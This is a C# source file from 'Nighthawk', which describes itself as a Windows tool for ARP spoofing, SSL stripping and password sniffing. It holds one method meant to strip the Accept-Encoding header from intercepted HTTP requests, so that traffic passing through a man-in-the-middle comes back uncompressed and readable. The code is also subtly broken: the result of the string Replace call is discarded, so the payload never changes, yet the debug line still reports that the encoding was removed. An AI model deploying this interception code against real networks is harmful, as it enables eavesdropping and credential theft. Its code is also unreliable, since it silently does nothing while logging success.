﻿using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using PacketDotNet;

/**
Nighthawk - ARP/ND spoofing, simple SSL stripping and password sniffing for Windows
Author: Wolfgang Christl

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program.  If not, see <http://www.gnu.org/licenses/>.
**/
namespace Nighthawk
{
    class Manipulation
    {
        private static UTF8Encoding encoding = new UTF8Encoding();

        public Packet DontAskForEncoding(Packet packet)
        {
            System.Diagnostics.Debug.WriteLine("Removing Encoding: " + packet.ToString());
            //Check if it is a HTML Request and change Accept-Encoding
            var tcp = PacketDotNet.TcpPacket.GetEncapsulated(packet);
            HttpPacket http = new HttpPacket(tcp);

            if(http.Header.AcceptEncoding.Length>2){
                var data = encoding.GetString(tcp.PayloadData);
                data.Replace(http.Header.AcceptEncoding,"");
                var newpayload = encoding.GetBytes(data);
                tcp.PayloadData = newpayload;
                tcp.UpdateTCPChecksum();
                System.Diagnostics.Debug.WriteLine("Encoding Removed: "+packet.ToString());
            }
            return packet;
        }
    }
}
